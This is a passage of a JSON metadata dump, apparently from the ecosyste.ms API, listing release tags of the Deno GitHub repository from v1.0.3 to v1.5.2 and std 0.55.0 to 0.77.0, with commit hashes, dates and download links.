1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/den